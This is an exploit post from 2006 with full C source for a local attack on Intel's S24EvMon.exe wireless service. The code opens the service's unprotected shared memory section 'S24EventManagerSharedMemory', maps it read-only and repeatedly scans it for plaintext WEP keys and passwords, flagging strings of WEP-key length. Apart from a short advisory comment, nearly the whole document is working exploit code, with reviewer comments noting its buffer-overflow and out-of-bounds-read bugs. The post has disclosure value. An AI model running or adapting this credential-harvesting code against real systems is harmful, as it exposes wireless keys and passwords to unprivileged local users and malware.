Intel Wireless Service (s24evmon.exe) Shared Memory Exploit
来源:www.reversemode.com 作者:ruben 发布时间:2006-05-10  

///////////////////////////////////////////////////////////////////////
//// S24EvMon.exe Intel Wireless Management Service KEY Hunter
//// Rubén Santamarta
//// ruben@reversemode.com
//// www.reversemode.com
//// 28/04/2006
///////////////////////////////////////////////////////////////////////

/**********************************************************************************************************
* While testing a vuln-finder application that I am developing, I found a flaw in S24EvMon.exe.
* It is a service which is part of (at least) the Intel PROSet/Wireless software. This application
* is provided by Intel to support Intel wireless devices based on Spectrum 24 chipsets.
*
* This service uses a shared memory section which is created without the proper security descriptor,
* allowing unprivileged users to perform operations such as Delete, Read or Write on the memory. The
* section is named S24EventManagerSharedMemory.
*
* This shared memory is used to store, in plain text, confidential information such as WEP keys, passwords...
*
* Successful exploitation of this vulnerability could allow any unprivileged user to access
* confidential information, exposing the network. An important mitigating factor is that the
* vulnerability is local; nevertheless, malware could take advantage of this flaw.
**********************************************************************************************************/

#include <windows.h>
#include <stdio.h>

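/* Fill an OBJECT_ATTRIBUTES for the native NtOpenSection call in main().
 *   p: OBJECT_ATTRIBUTES *   n: UNICODE_STRING * (object name)
 *   a: attribute flags       r: root directory handle
 *   s: security descriptor (NULL in this program)
 * Wrapped in do/while(0) and with every argument parenthesized so the macro
 * behaves as one statement (safe under an unbraced if/else) and accepts
 * expression arguments; the expansion is otherwise unchanged. */
#define InitializeObjectAttributes( p, n, a, r, s ) do { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = (r); \
(p)->Attributes = (a); \
(p)->ObjectName = (n); \
(p)->SecurityDescriptor = (s); \
(p)->SecurityQualityOfService = NULL; \
} while (0)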

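/* Fill a UNICODE_STRING from a NUL-terminated wide string without copying it
 * (Buffer aliases s, so s must outlive p). Length and MaximumLength are byte
 * counts, hence the sizeof(WCHAR) scaling; MaximumLength also covers the
 * terminator. Both fields are USHORT, so the casts only make the narrowing
 * that already happened explicit (a string over 32767 characters would be
 * truncated silently). s is evaluated more than once; pass a literal or a
 * side-effect-free expression. do/while(0) makes the macro a single statement. */
#define InitializeUnicodeStr(p,s) do { \
(p)->Length = (USHORT)(wcslen(s) * sizeof(WCHAR)); \
(p)->MaximumLength = (USHORT)(wcslen(s) * sizeof(WCHAR) + sizeof(WCHAR)); \
(p)->Buffer = (s); \
} while (0)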


/* Local copies of the native (ntdll) types this program needs; <windows.h>
 * does not declare them. Field order and sizes must match the OS layouts
 * for the NtQuerySection result to be read correctly. */
typedef struct _SECTION_BASIC_INFORMATION {
ULONG d000;                 /* the OS defines this first member as a pointer (BaseAddress); a ULONG only matches on 32-bit Windows -- unused here */
ULONG SectionAttributes;
LARGE_INTEGER SectionSize;  /* section size in bytes; main() uses it as the scan bound */
} SECTION_BASIC_INFORMATION;

/* Counted wide string: Length/MaximumLength are in bytes, not characters,
 * and Buffer need not be NUL-terminated (it is, in this program). */
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;

/* Object-name descriptor passed to NtOpenSection; filled by InitializeObjectAttributes. */
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;               /* sizeof(OBJECT_ATTRIBUTES) */
HANDLE RootDirectory;
UNICODE_STRING *ObjectName; /* full NT object path, e.g. \BaseNamedObjects\<name> */
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

/* NtQuerySection(SectionHandle, SectionInformationClass, SectionInformation, Length, ResultLength).
 * The real return type is NTSTATUS; declared as DWORD here, which still works for the
 * `if (NtQuerySection(...))` check in main() because STATUS_SUCCESS is 0. */
typedef DWORD (WINAPI* PQUERYSECTION)(HANDLE, DWORD, PVOID,DWORD,DWORD*);

/* NtOpenSection(SectionHandle, DesiredAccess, ObjectAttributes); returns NTSTATUS (see above).
 * main() ignores the status and checks the handle instead. */
typedef DWORD (WINAPI* POPENSECTION)(HANDLE*, DWORD,OBJECT_ATTRIBUTES* );


/* Show the text of the last Win32 error in a message box and terminate.
 * Never returns: the process exits with status 1 after the box is dismissed.
 * The buffer allocated by FormatMessage is not released explicitly because
 * the process ends immediately afterwards. */
VOID ShowError()
{
DWORD lastError = GetLastError();
DWORD flags = FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM;
LPSTR message = NULL;

/* With FORMAT_MESSAGE_ALLOCATE_BUFFER the "buffer" argument receives a pointer,
 * hence the address-of cast on message. */
FormatMessage(flags,
NULL,
lastError,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR)&message,
0,
NULL);

MessageBoxA(NULL, (LPCSTR)message, "Error", MB_OK);
exit(1);
}

/* Open the S24EventManagerSharedMemory section read-only, map it, and take
 * 100 snapshots one second apart, printing every run of printable bytes it
 * finds and tagging runs whose length matches a WEP key.
 * argc/argv are unused. Returns 0 after the 100 snapshots; any API failure
 * goes through ShowError(), which exits with status 1. */
int main(int argc, char* argv[])
{
OBJECT_ATTRIBUTES SectionAttributes;
SECTION_BASIC_INFORMATION buff;
PQUERYSECTION NtQuerySection;
POPENSECTION NtOpenSection;
/* cString collects one run of printable bytes; b is its write index.
 * NOTE(review): b is never bounded, so a run longer than 255 bytes writes
 * past the end of this 256-byte stack buffer. */
char * sMap,cString[256];
UNICODE_STRING uStr;
LPVOID lpMapAddress;
DWORD i,b=0,c=0;   /* i: byte offset into the view; c: snapshot counter */
HANDLE hSection;   /* NOTE(review): never initialised; see the NtOpenSection check below */


/* Both natives are resolved at run time from ntdll.dll; neither GetProcAddress
 * result is checked, so a NULL pointer would be called on a system without them. */
NtOpenSection = (POPENSECTION) GetProcAddress( LoadLibrary( "ntdll.dll" ),
"NtOpenSection" );

NtQuerySection = (PQUERYSECTION) GetProcAddress( LoadLibrary( "ntdll.dll"),
"NtQuerySection" );

/* Full NT object path of the section; no root directory, no attributes. */
InitializeUnicodeStr(&uStr,L"\\BaseNamedObjects\\S24EventManagerSharedMemory");
InitializeObjectAttributes(&SectionAttributes, &uStr,NULL, NULL, NULL );


/* Read + query access is all the scan needs. The NTSTATUS return is ignored;
 * NOTE(review): if the call fails without writing hSection, the NULL test
 * below reads an indeterminate value -- checking the status would be exact. */
NtOpenSection( &hSection, SECTION_MAP_READ|SECTION_QUERY, &SectionAttributes );

if (hSection == NULL) ShowError();
printf("Section opened successfully.\n");

/* Map the whole section (size 0 = to the end) read-only. It is never
 * unmapped; the process exit reclaims it. */
lpMapAddress = MapViewOfFile(hSection, FILE_MAP_READ, 0, 0, 0);
if (lpMapAddress == NULL) ShowError();

/* Information class 0 is SectionBasicInformation; ResultLength is not requested.
 * Any non-zero status is treated as failure. */
if (NtQuerySection(hSection,0,&buff,sizeof(buff),0)) ShowError();

sMap= ( char* )lpMapAddress;
printf("Scanning section...\n\n");

/* 100 snapshots, one second apart, so values written into the section
 * after start-up are also seen. */
while(c<100)
{

c++;
printf("\nSNAPSHOT ID[%d]----------------[BEGIN]\n\n",c);

/* i is a DWORD compared against a LONGLONG section size; fine for sections
 * under 4 GB, which is presumably always the case here. */
for (i=0; i< buff.SectionSize.QuadPart; i++)
{

/* Start of a candidate run: any byte above 0x29. With MSVC's default
 * signed char, bytes >= 0x80 compare negative and are skipped. */
if( sMap[i]> 0x29 )
{
/* Consume up to the next NUL, keeping only bytes >= '0' (0x30).
 * NOTE(review): there is no i < SectionSize check inside this loop, so
 * a run that reaches the last byte of the view reads past the mapping. */
while( sMap[i] != 0x0 )
{
if( sMap[i]>=0x30 )
{
cString[b] = sMap[i];
b++;
}
i++;
}

/* Terminate the run; b now includes the NUL, so b == N+1 means N characters.
 * The for loop's i++ then steps over the NUL that ended the run. */
cString[b++]='\0';
// Runs of fewer than 3 characters are assumed to be garbage.
if( b>3 && b!=14 && b!=27 ) printf(" String collected: %s\n",cString);
// Alphanumeric WEP KEY (13 characters + terminator).
if( b==14 ) printf("### Possible Alphanumeric WEP KEY found: %s\n",cString);
/* 26 characters + terminator: the length of a WEP key written as hex digits. */
if( b==27 )
{
/* Heuristic filter: a '0' at offset 0, 2 or 6 is taken to mean "not a key";
 * the rationale is not stated in the original. */
if(cString[0]!=0x30 && cString[2]!=0x30 && cString[6]!=0x30)
printf("### Possible WEP KEY found(Ascii/HexMode): %s\n",cString);
else
printf(" String collected: %s\n",cString);
}
b=0;
}

}
printf("\nSNAPSHOT ID[%d]----------------[END]\n",c);

Sleep(1000);
}

CloseHandle(hSection);

return 0;
}



 